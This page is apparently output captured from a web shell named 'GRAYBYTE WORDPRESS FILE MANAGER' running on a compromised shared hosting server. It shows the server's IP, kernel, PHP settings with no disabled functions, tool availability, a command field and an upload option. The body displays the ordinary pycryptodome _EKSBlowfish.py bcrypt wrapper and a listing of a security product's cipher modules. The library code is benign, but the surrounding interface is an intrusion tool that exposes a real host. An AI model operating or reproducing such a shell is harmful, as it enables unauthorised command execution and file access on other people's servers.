GRAYBYTE WORDPRESS FILE MANAGER6832

Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /opt/imunify360/venv/lib/python3.11/site-packages/Crypto/Cipher/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /opt/imunify360/venv/lib/python3.11/site-packages/Crypto/Cipher//_EKSBlowfish.py
# ===================================================================
#
# Copyright (c) 2019, Legrandin <helderijs@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in
#    the documentation and/or other materials provided with the
#    distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ===================================================================

import sys

from Crypto.Cipher import _create_cipher
from Crypto.Util._raw_api import (load_pycryptodome_raw_lib,
                                  VoidPointer, SmartPointer, c_size_t,
                                  c_uint8_ptr, c_uint)

_raw_blowfish_lib = load_pycryptodome_raw_lib(
        "Crypto.Cipher._raw_eksblowfish",
        """
        int EKSBlowfish_start_operation(const uint8_t key[],
                                        size_t key_len,
                                        const uint8_t salt[16],
                                        size_t salt_len,
                                        unsigned cost,
                                        unsigned invert,
                                        void **pResult);
        int EKSBlowfish_encrypt(const void *state,
                                const uint8_t *in,
                                uint8_t *out,
                                size_t data_len);
        int EKSBlowfish_decrypt(const void *state,
                                const uint8_t *in,
                                uint8_t *out,
                                size_t data_len);
        int EKSBlowfish_stop_operation(void *state);
        """
        )


def _create_base_cipher(dict_parameters):
    """This method instantiates and returns a smart pointer to
    a low-level base cipher. It will absorb named parameters in
    the process."""

    try:
        key = dict_parameters.pop("key")
        salt = dict_parameters.pop("salt")
        cost = dict_parameters.pop("cost")
    except KeyError as e:
        raise TypeError("Missing EKSBlowfish parameter: " + str(e))
    invert = dict_parameters.pop("invert", True)

    if len(key) not in key_size:
        raise ValueError("Incorrect EKSBlowfish key length (%d bytes)" % len(key))

    start_operation = _raw_blowfish_lib.EKSBlowfish_start_operation
    stop_operation = _raw_blowfish_lib.EKSBlowfish_stop_operation

    void_p = VoidPointer()
    result = start_operation(c_uint8_ptr(key),
                             c_size_t(len(key)),
                             c_uint8_ptr(salt),
                             c_size_t(len(salt)),
                             c_uint(cost),
                             c_uint(int(invert)),
                             void_p.address_of())
    if result:
        raise ValueError("Error %X while instantiating the EKSBlowfish cipher"
                         % result)
    return SmartPointer(void_p.get(), stop_operation)


def new(key, mode, salt, cost, invert):
    """Create a new EKSBlowfish cipher
    
    Args:

      key (bytes, bytearray, memoryview):
        The secret key to use in the symmetric cipher.
        Its length can vary from 0 to 72 bytes.

      mode (one of the supported ``MODE_*`` constants):
        The chaining mode to use for encryption or decryption.

      salt (bytes, bytearray, memoryview):
        The salt that bcrypt uses to thwart rainbow table attacks

      cost (integer):
        The complexity factor in bcrypt

      invert (bool):
        If ``False``, in the inner loop use ``ExpandKey`` first over the salt
        and then over the key, as defined in
        the `original bcrypt specification <https://www.usenix.org/legacy/events/usenix99/provos/provos_html/node4.html>`_.
        If ``True``, reverse the order, as in the first implementation of
        `bcrypt` in OpenBSD.

    :Return: an EKSBlowfish object
    """

    kwargs = { 'salt':salt, 'cost':cost, 'invert':invert }
    return _create_cipher(sys.modules[__name__], key, mode, **kwargs)


MODE_ECB = 1

# Size of a data block (in bytes)
block_size = 8
# Size of a key (in bytes)
key_size = range(0, 72 + 1)

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 02 2025 08:36:55
root / root
0755
__pycache__
--
July 02 2025 08:36:55
root / root
0755
AES.py
8.709 KB
June 09 2025 11:12:39
root / root
0644
AES.pyi
3.629 KB
June 09 2025 11:12:39
root / root
0644
ARC2.py
6.846 KB
June 09 2025 11:12:39
root / root
0644
ARC2.pyi
0.957 KB
June 09 2025 11:12:39
root / root
0644
ARC4.py
4.996 KB
June 09 2025 11:12:39
root / root
0644
ARC4.pyi
0.403 KB
June 09 2025 11:12:39
root / root
0644
Blowfish.py
5.824 KB
June 09 2025 11:12:39
root / root
0644
Blowfish.pyi
0.992 KB
June 09 2025 11:12:39
root / root
0644
CAST.py
5.929 KB
June 09 2025 11:12:39
root / root
0644
CAST.pyi
0.958 KB
June 09 2025 11:12:39
root / root
0644
ChaCha20.py
10.484 KB
June 09 2025 11:12:39
root / root
0644
ChaCha20.pyi
0.77 KB
June 09 2025 11:12:39
root / root
0644
ChaCha20_Poly1305.py
11.29 KB
June 09 2025 11:12:39
root / root
0644
ChaCha20_Poly1305.pyi
1.08 KB
June 09 2025 11:12:39
root / root
0644
DES.py
5.808 KB
June 09 2025 11:12:39
root / root
0644
DES.pyi
0.938 KB
June 09 2025 11:12:39
root / root
0644
DES3.py
6.763 KB
June 09 2025 11:12:39
root / root
0644
DES3.pyi
1.007 KB
June 09 2025 11:12:39
root / root
0644
PKCS1_OAEP.py
8.62 KB
June 09 2025 11:12:39
root / root
0644
PKCS1_OAEP.pyi
1.151 KB
June 09 2025 11:12:39
root / root
0644
PKCS1_v1_5.py
7.95 KB
June 09 2025 11:12:39
root / root
0644
PKCS1_v1_5.pyi
0.67 KB
June 09 2025 11:12:39
root / root
0644
Salsa20.py
6.2 KB
June 09 2025 11:12:39
root / root
0644
Salsa20.pyi
0.733 KB
June 09 2025 11:12:39
root / root
0644
_ARC4.abi3.so
15.57 KB
June 09 2025 11:13:05
root / root
0755
_EKSBlowfish.py
5.083 KB
June 09 2025 11:12:39
root / root
0644
_EKSBlowfish.pyi
0.26 KB
June 09 2025 11:12:39
root / root
0644
_Salsa20.abi3.so
15.711 KB
June 09 2025 11:13:05
root / root
0755
__init__.py
2.777 KB
June 09 2025 11:12:39
root / root
0644
__init__.pyi
0 KB
June 09 2025 11:12:39
root / root
0644
_chacha20.abi3.so
15.688 KB
June 09 2025 11:13:05
root / root
0755
_mode_cbc.py
10.633 KB
June 09 2025 11:12:39
root / root
0644
_mode_cbc.pyi
0.671 KB
June 09 2025 11:12:39
root / root
0644
_mode_ccm.py
23.804 KB
June 09 2025 11:12:39
root / root
0644
_mode_ccm.pyi
1.563 KB
June 09 2025 11:12:39
root / root
0644
_mode_cfb.py
10.47 KB
June 09 2025 11:12:39
root / root
0644
_mode_cfb.pyi
0.71 KB
June 09 2025 11:12:39
root / root
0644
_mode_ctr.py
15.441 KB
June 09 2025 11:12:39
root / root
0644
_mode_ctr.pyi
0.781 KB
June 09 2025 11:12:39
root / root
0644
_mode_eax.py
14.114 KB
June 09 2025 11:12:39
root / root
0644
_mode_eax.pyi
1.509 KB
June 09 2025 11:12:39
root / root
0644
_mode_ecb.py
8.114 KB
June 09 2025 11:12:39
root / root
0644
_mode_ecb.pyi
0.578 KB
June 09 2025 11:12:39
root / root
0644
_mode_gcm.py
20.798 KB
June 09 2025 11:12:39
root / root
0644
_mode_gcm.pyi
1.505 KB
June 09 2025 11:12:39
root / root
0644
_mode_ocb.py
19.468 KB
June 09 2025 11:12:39
root / root
0644
_mode_ocb.pyi
1.202 KB
June 09 2025 11:12:39
root / root
0644
_mode_ofb.py
9.97 KB
June 09 2025 11:12:39
root / root
0644
_mode_ofb.pyi
0.675 KB
June 09 2025 11:12:39
root / root
0644
_mode_openpgp.py
6.888 KB
June 09 2025 11:12:39
root / root
0644
_mode_openpgp.pyi
0.543 KB
June 09 2025 11:12:39
root / root
0644
_mode_siv.py
13.649 KB
June 09 2025 11:12:39
root / root
0644
_mode_siv.pyi
1.231 KB
June 09 2025 11:12:39
root / root
0644
_pkcs1_decode.abi3.so
15.586 KB
June 09 2025 11:13:05
root / root
0755
_raw_aes.abi3.so
31.953 KB
June 09 2025 11:13:05
root / root
0755
_raw_aesni.abi3.so
19.906 KB
June 09 2025 11:13:05
root / root
0755
_raw_arc2.abi3.so
19.695 KB
June 09 2025 11:13:05
root / root
0755
_raw_blowfish.abi3.so
23.68 KB
June 09 2025 11:13:05
root / root
0755
_raw_cast.abi3.so
27.914 KB
June 09 2025 11:13:05
root / root
0755
_raw_cbc.abi3.so
15.563 KB
June 09 2025 11:13:05
root / root
0755
_raw_cfb.abi3.so
15.852 KB
June 09 2025 11:13:05
root / root
0755
_raw_ctr.abi3.so
15.898 KB
June 09 2025 11:13:05
root / root
0755
_raw_des.abi3.so
48.094 KB
June 09 2025 11:13:05
root / root
0755
_raw_des3.abi3.so
48.102 KB
June 09 2025 11:13:05
root / root
0755
_raw_ecb.abi3.so
15.414 KB
June 09 2025 11:13:05
root / root
0755
_raw_eksblowfish.abi3.so
31.695 KB
June 09 2025 11:13:05
root / root
0755
_raw_ocb.abi3.so
19.82 KB
June 09 2025 11:13:05
root / root
0755
_raw_ofb.abi3.so
15.57 KB
June 09 2025 11:13:05
root / root
0755

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF